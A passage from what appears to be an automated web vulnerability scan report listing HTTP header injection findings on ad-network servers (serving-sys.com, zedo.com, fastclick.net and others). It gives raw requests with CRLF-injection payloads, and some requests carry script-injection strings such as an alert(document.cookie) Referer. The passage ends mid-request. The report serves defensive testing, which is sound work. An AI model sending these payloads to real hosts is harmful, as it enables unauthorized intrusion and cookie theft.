Location: http://ad.doubleclick.net/jump/N3671.CentroNetwork/B5159652.2;abr=!ie4;abr=!ie5;sz=300x250;pc=[TPAS_ID];ord=2803508621?3690c
1a9836ae15c
P3P: policyref="http://ad.afy11.net/privacy.xml", CP=" NOI DSP NID ADMa DEVa PSAa PSDa OUR OTRa IND COM NAV STA OTC"

3.127. http://au.track.decideinteractive.com/n/13465/13553/www.247realmedia.com/5143c0dd002503000000000600000000036393fa0000000000000000000000000000000100/i/c [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://au.track.decideinteractive.com
Path:	/n/13465/13553/www.247realmedia.com/5143c0dd002503000000000600000000036393fa0000000000000000000000000000000100/i/c

Issue detail

The value of REST URL parameter 4 is copied into the location response header. The payload 1257a%0d%0a5c54a5c22bc was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /n/13465/13553/1257a%0d%0a5c54a5c22bc/5143c0dd002503000000000600000000036393fa0000000000000000000000000000000100/i/c HTTP/1.1
Host: au.track.decideinteractive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Fri, 28 Jan 2011 14:12:05 GMT
Server: Apache/1.3.33 (Unix)
Pragma: no-cache
Expires: Fri, 28 Jan 2011 14:12:05 GMT
location: http://1257a
5c54a5c22bc
Set-Cookie: id=9272912264552253015; expires=Sat, 28-Jan-2012 14:12:05 GMT; path=/; domain=.decideinteractive.com;
Set-Cookie: name=9272912264602585191; path=/; domain=.decideinteractive.com;
Content-Length: 0
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain

3.128. http://bs.serving-sys.com/BurstingPipe/BannerSource.asp [eyeblaster cookie] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bs.serving-sys.com
Path:	/BurstingPipe/BannerSource.asp

Issue detail

The value of the eyeblaster cookie is copied into the Set-Cookie response header. The payload b1baf%0d%0a7abf175386a was submitted in the eyeblaster cookie. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/BannerSource.asp HTTP/1.1
Host: bs.serving-sys.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0b1baf%0d%0a7abf175386a; B3=89PS000000000GsZ7lgH0000000001sG89PT000000000RsZ852G0000000003sS7dNH0000000002sZ8cVQ0000000001sV83xP0000000001sF6o.Q0000000001sY7gi30000000001sG852z0000000001sS852A0000000001sS; A3=h5j3abLU07l00000Rh5iUabLQ07l00000Gf+JvabEk02WG00002gNfHaaiN0aVX00001gn3Ka4JO09MY00001fU+La50V0a+r00001fUFGa50V02WG00001cRreabeg03Dk00001gy7La9bU0c9M00003gCTVa9bU0c9M00001gy5Da9bU0c9M00001; u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; C4=; u3=1;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 0
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0b1baf
7abf175386a; expires=Fri, 29-Apr-2011 00: 23:03 GMT; domain=bs.serving-sys.com; path=/
Set-Cookie: u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; expires=Fri, 29-Apr-2011 00:23:03 GMT; domain=.serving-sys.com; path=/
Set-Cookie: C_=BlankImage
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sat, 29 Jan 2011 05:23:03 GMT
Connection: close

3.129. http://bs.serving-sys.com/BurstingPipe/adServer.bs [bwVal parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bs.serving-sys.com
Path:	/BurstingPipe/adServer.bs

Issue detail

The value of the bwVal request parameter is copied into the Set-Cookie response header. The payload 3a3a9%0d%0a04e21258072 was submitted in the bwVal parameter. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/adServer.bs?cn=int&iv=2&int=4189023~~0~~~^ebAdDuration~398~0~01020^Panel1_duration~10~0~01001^Panel1_autoshow~0~0~01001&OptOut=0&ebRandom=0.05569868558086455&flv=10.1103&wmpv=0&res=128&bwVal=3a3a9%0d%0a04e21258072&bwTime=1296236256165 HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://www.cbs6albany.com/sections/thirdParty/iframe_header/?domain=events.cbs6albany.com&cname=zvents&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7Cevent&taxonomy=entertainment&trackstats=no
Origin: http://www.cbs6albany.com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: u2=34e2bb94-b226-4e3e-b664-3ef3ef3ffc003Gq060; expires=Thu, 28-Apr-2011 20:57:32 GMT; domain=.serving-sys.com; path=/
Set-Cookie: eyeblaster=BWVal=3a3a9
04e21258072&BWDate=40571.873287&debuglevel=&FLV=10.1103&RES=128&WMPV=0; expires=Thu, 28-Apr-2011 20: 57:32 GMT; domain=bs.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sat, 29 Jan 2011 01:57:31 GMT
Connection: close
Content-Length: 0

3.130. http://bs.serving-sys.com/BurstingPipe/adServer.bs [eyeblaster cookie] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bs.serving-sys.com
Path:	/BurstingPipe/adServer.bs

Issue detail

The value of the eyeblaster cookie is copied into the Set-Cookie response header. The payload 57ca0%0d%0a51ce047d9a0 was submitted in the eyeblaster cookie. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=1891435&PluID=0&w=728&h=90&ord=2784774291777236223&ucm=true&ncu=http://r.turn.com/r/formclick/id/_6wFyXaBpSZSDgIAZwABAA/url/ HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://www.cbs6albany.com/sections/thirdParty/iframe_header/?domain=events.cbs6albany.com&cname=zvents&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7Cevent&taxonomy=entertainment&trackstats=no
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u3=1; C4=; eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=057ca0%0d%0a51ce047d9a0; A3=gn3Ka4JO09MY00001gNfHaaiN0aVX00001fU+La50V0a+r00001fUFGa50V02WG00001cRreabeg03Dk00001gy7La9bU0c9M00003gy5Da9bU0c9M00001gCTVa9bU0c9M00001; B3=7lgH0000000001sG852G0000000003sS83xP0000000001sF8cVQ0000000001sV6o.Q0000000001sY7gi30000000001sG852z0000000001sS852A0000000001sS; u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=057ca0
51ce047d9a0; expires=Thu, 28-Apr-2011 20: 57:33 GMT; domain=bs.serving-sys.com; path=/
Set-Cookie: A3=f+JvabM902WG00001gNfHaaiN0aVX00001gn3Ka4JO09MY00001fU+La50V0a+r00001fUFGa50V02WG00001cRreabeg03Dk00001gy7La9bU0c9M00003gCTVa9bU0c9M00001gy5Da9bU0c9M00001; expires=Thu, 28-Apr-2011 20:57:33 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B3=7lgH0000000001sG852G0000000003sS7dNH0000000001sZ8cVQ0000000001sV83xP0000000001sF6o.Q0000000001sY7gi30000000001sG852z0000000001sS852A0000000001sS; expires=Thu, 28-Apr-2011 20:57:33 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; expires=Thu, 28-Apr-2011 20:57:33 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sat, 29 Jan 2011 01:57:32 GMT
Connection: close
Content-Length: 3021

var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index
...[SNIP]...

3.131. http://bs.serving-sys.com/BurstingPipe/adServer.bs [flv parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bs.serving-sys.com
Path:	/BurstingPipe/adServer.bs

Issue detail

The value of the flv request parameter is copied into the Set-Cookie response header. The payload 3d56a%0d%0a2e04529cfa5 was submitted in the flv parameter. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/adServer.bs?cn=int&iv=2&int=4189023~~0~~~^ebAdDuration~398~0~01020^Panel1_duration~10~0~01001^Panel1_autoshow~0~0~01001&OptOut=0&ebRandom=0.05569868558086455&flv=3d56a%0d%0a2e04529cfa5&wmpv=0&res=128&bwVal=2030&bwTime=1296236256165 HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://www.cbs6albany.com/sections/thirdParty/iframe_header/?domain=events.cbs6albany.com&cname=zvents&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7Cevent&taxonomy=entertainment&trackstats=no
Origin: http://www.cbs6albany.com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: u2=cb071012-5f18-494e-9aae-163a1c96cedc3Gq030; expires=Thu, 28-Apr-2011 20:57:32 GMT; domain=.serving-sys.com; path=/
Set-Cookie: eyeblaster=BWVal=2030&BWDate=40571.873287&debuglevel=&FLV=3d56a
2e04529cfa5&RES=128&WMPV=0; expires=Thu, 28-Apr-2011 20: 57:32 GMT; domain=bs.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sat, 29 Jan 2011 01:57:31 GMT
Connection: close
Content-Length: 0

3.132. http://bs.serving-sys.com/BurstingPipe/adServer.bs [res parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bs.serving-sys.com
Path:	/BurstingPipe/adServer.bs

Issue detail

The value of the res request parameter is copied into the Set-Cookie response header. The payload fee85%0d%0a8acf345c028 was submitted in the res parameter. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/adServer.bs?cn=int&iv=2&int=4189023~~0~~~^ebAdDuration~398~0~01020^Panel1_duration~10~0~01001^Panel1_autoshow~0~0~01001&OptOut=0&ebRandom=0.05569868558086455&flv=10.1103&wmpv=0&res=fee85%0d%0a8acf345c028&bwVal=2030&bwTime=1296236256165 HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://www.cbs6albany.com/sections/thirdParty/iframe_header/?domain=events.cbs6albany.com&cname=zvents&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7Cevent&taxonomy=entertainment&trackstats=no
Origin: http://www.cbs6albany.com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: u2=03177a3f-cd65-40a8-b9c3-8c6208fd089a3Gq040; expires=Thu, 28-Apr-2011 20:57:32 GMT; domain=.serving-sys.com; path=/
Set-Cookie: eyeblaster=BWVal=2030&BWDate=40571.873287&debuglevel=&FLV=10.1103&RES=fee85
8acf345c028&WMPV=0; expires=Thu, 28-Apr-2011 20: 57:32 GMT; domain=bs.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sat, 29 Jan 2011 01:57:31 GMT
Connection: close
Content-Length: 0

3.133. http://bs.serving-sys.com/BurstingPipe/adServer.bs [wmpv parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bs.serving-sys.com
Path:	/BurstingPipe/adServer.bs

Issue detail

The value of the wmpv request parameter is copied into the Set-Cookie response header. The payload 4d23d%0d%0ab83ab2cdd72 was submitted in the wmpv parameter. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/adServer.bs?cn=int&iv=2&int=4189023~~0~~~^ebAdDuration~398~0~01020^Panel1_duration~10~0~01001^Panel1_autoshow~0~0~01001&OptOut=0&ebRandom=0.05569868558086455&flv=10.1103&wmpv=4d23d%0d%0ab83ab2cdd72&res=128&bwVal=2030&bwTime=1296236256165 HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://www.cbs6albany.com/sections/thirdParty/iframe_header/?domain=events.cbs6albany.com&cname=zvents&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7Cevent&taxonomy=entertainment&trackstats=no
Origin: http://www.cbs6albany.com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: u2=200545f6-3e94-416a-bea3-08b81f3152ff3Gq050; expires=Thu, 28-Apr-2011 20:57:31 GMT; domain=.serving-sys.com; path=/
Set-Cookie: eyeblaster=BWVal=2030&BWDate=40571.873275&debuglevel=&FLV=10.1103&RES=128&WMPV=4d23d
b83ab2cdd72; expires=Thu, 28-Apr-2011 20: 57:31 GMT; domain=bs.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sat, 29 Jan 2011 01:57:31 GMT
Connection: close
Content-Length: 0

3.134. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [$ parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://c7.zedo.com
Path:	/bar/v16-401/c5/jsc/fm.js

Issue detail

The value of the $ request parameter is copied into the Set-Cookie response header. The payload b50db%0d%0a33e663e7a7e was submitted in the $ parameter. This caused a response containing an injected HTTP header.

Request

GET /bar/v16-401/c5/jsc/fm.js?c=167&a=0&f=&n=1220&r=13&d=14&q=&$=b50db%0d%0a33e663e7a7e&s=126&l=http%3A//hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63723/0/cj/V12D7843BC0J-573I704K63342ADC1D6F3ADC1D6F3K82427K82131QK63359QQP0G00G0Q05BC4B4000001E/&z=0.9975781855173409 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(1)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; FFgeo=5386156; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636|0,24,1:0,25,1:0,25,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1; ZFFAbh=749B826,20|1483_758#365; ZCBC=1; FFad=0; FFcat=1220,101,9

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1220:b50db
33e663e7a7e;expires=Sat, 29 Jan 2011 05: 00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1220,167,14:1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0:0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "419234-82a5-4988a5a7ea280"
Vary: Accept-Encoding
X-Varnish: 1882666994
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=43
Expires: Fri, 28 Jan 2011 16:41:50 GMT
Date: Fri, 28 Jan 2011 16:41:07 GMT
Connection: close
Content-Length: 1914

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=126;var zzPat=',b50db

...[SNIP]...

3.135. http://c7.zedo.com/bar/v16-401/c5/jsc/fmr.js [$ parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://c7.zedo.com
Path:	/bar/v16-401/c5/jsc/fmr.js

Issue detail

The value of the $ request parameter is copied into the Set-Cookie response header. The payload 9bc45%0d%0ad1fca8116ea was submitted in the $ parameter. This caused a response containing an injected HTTP header.

Request

GET /bar/v16-401/c5/jsc/fmr.js?c=101&a=0&f=&n=1220&r=13&d=9&q=&$=9bc45%0d%0ad1fca8116ea&s=69&l=http%3A//hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63722/0/cj/V127BB6CB93J-573I704K63342ADC1D6F3ADC1D6F3K63704K63703QK63352QQP0G00G0Q05BC434B000016/&z=0.11480318708345294 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; FFgeo=5386156; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636|0,24,1:0,25,1:0,25,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1; ZFFAbh=749B826,20|1483_758#365; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1220:9bc45
d1fca8116ea;expires=Sat, 29 Jan 2011 05: 00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFgeo=5386156;expires=Sat, 28 Jan 2012 16:41:09 GMT;domain=.zedo.com;path=/;
ETag: "86257539-809a-4988a5ada3000"
Vary: Accept-Encoding
X-Varnish: 1882667040 1882666656
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=41
Expires: Fri, 28 Jan 2011 16:41:50 GMT
Date: Fri, 28 Jan 2011 16:41:09 GMT
Connection: close
Content-Length: 1920

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=69;var zzPat=',9bc45
d
...[SNIP]...

3.136. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [$ parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/bar/v16-401/d3/jsc/fm.js

Issue detail

The value of the $ request parameter is copied into the Set-Cookie response header. The payload 2fe69%0d%0ac7e535fa282 was submitted in the $ parameter. This caused a response containing an injected HTTP header.

Request

GET /bar/v16-401/d3/jsc/fm.js?c=7/2&a=0&f=&n=951&r=13&d=9&q=&$=2fe69%0d%0ac7e535fa282&s=2&z=0.43167143454775214 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://bh.heraldinteractive.com/includes/processAds.bg?position=Middle&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636|0,24,1:0,25,1:0,25,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1; ZFFAbh=749B826,20|1483_758#365; ZCBC=1; FFgeo=5386156; FFpb=1220:4f791'; FFcat=1220,101,9; FFad=0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1220:4f791'$951:2fe69
c7e535fa282;expires=Sat, 29 Jan 2011 05: 00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=826,187,9:951,7,9:1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0:0:0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1;expires=Mon, 28 Feb 2011 02:00:13 GMT;path=/;domain=.zedo.com;
ETag: "19b436a-82a5-4989a5927aac0"
Vary: Accept-Encoding
X-Varnish: 2233582065 2233582057
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=189
Expires: Sat, 29 Jan 2011 02:03:22 GMT
Date: Sat, 29 Jan 2011 02:00:13 GMT
Connection: close
Content-Length: 2263

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=2;var zzPat=',2fe69
c7e5
...[SNIP]...

3.137. http://media.fastclick.net/w/click.here [c parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://media.fastclick.net
Path:	/w/click.here

Issue detail

The value of the c request parameter is copied into the Location response header. The payload 61d82%0d%0ac94b6440ba8 was submitted in the c parameter. This caused a response containing an injected HTTP header.

Request

GET /w/click.here?cid=250428;mid=463354;m=1;sid=54393;c=0;tp=5;forced_click=http://clk.pointroll.com/bc/?a=1362053&c=61d82%0d%0ac94b6440ba8&i=EF9A0400-9CDB-6D58-1308-AD40023D0100&clickurl=http://ad.doubleclick.net/jump/N5664.134236.VALUECLICK/B4607923.9%3Bsz=1x1%3Bord=0.33574254042468965 HTTP/1.1
Host: media.fastclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lxc=AgAAAASMFi1NACAABHVydDE3IAfgBAADMwAAluAUHwEAAA==; lyc=BQAAAARmvzBNACAAARhFIASgAAaUMwAANhwpYBcBvUSgFCAABA49AAAZ4AoXQAABiw7gCS8ADSAvwAABaVrACSAAAksAAA==; zru=1|:1294800534|; adv_ic=BxQAAAAcbUNNIAYGAAFJAACZUCAHIAtAAAIes0CAFwdDAACpSAAAYEAUIAABU2jgAS8BP17gAS8CvQ0/4AAvBBtZAAB2ICtAAAFcZ+ABLwDF4AIvAZph4AEXALDgAhcBpmDgARcBAlvgAV8B0FzgARcA/CCPwKcBCFfgARcAviBHAANAdCAAAXhL4AEXAHngAkcBXNWg1yDvAWQ44AFHAIvAvyAXAc1P4AFHAFXgAhcBR1PgAS8AJuACFwAPIHfAjwAD4AIXABjgAhcB/gyhHyBfAbda4AEvANzgAhcAxuACFwDY4AIXACjgAkcA0+ACFwHVXOABRwCr4AIXAXlHwBcBAAA=; vt=10070:256698:477674:54816:0:1295925050:3|10991:274413:511325:54393:0:1296263251:0|; pluto=517004695355|v1; 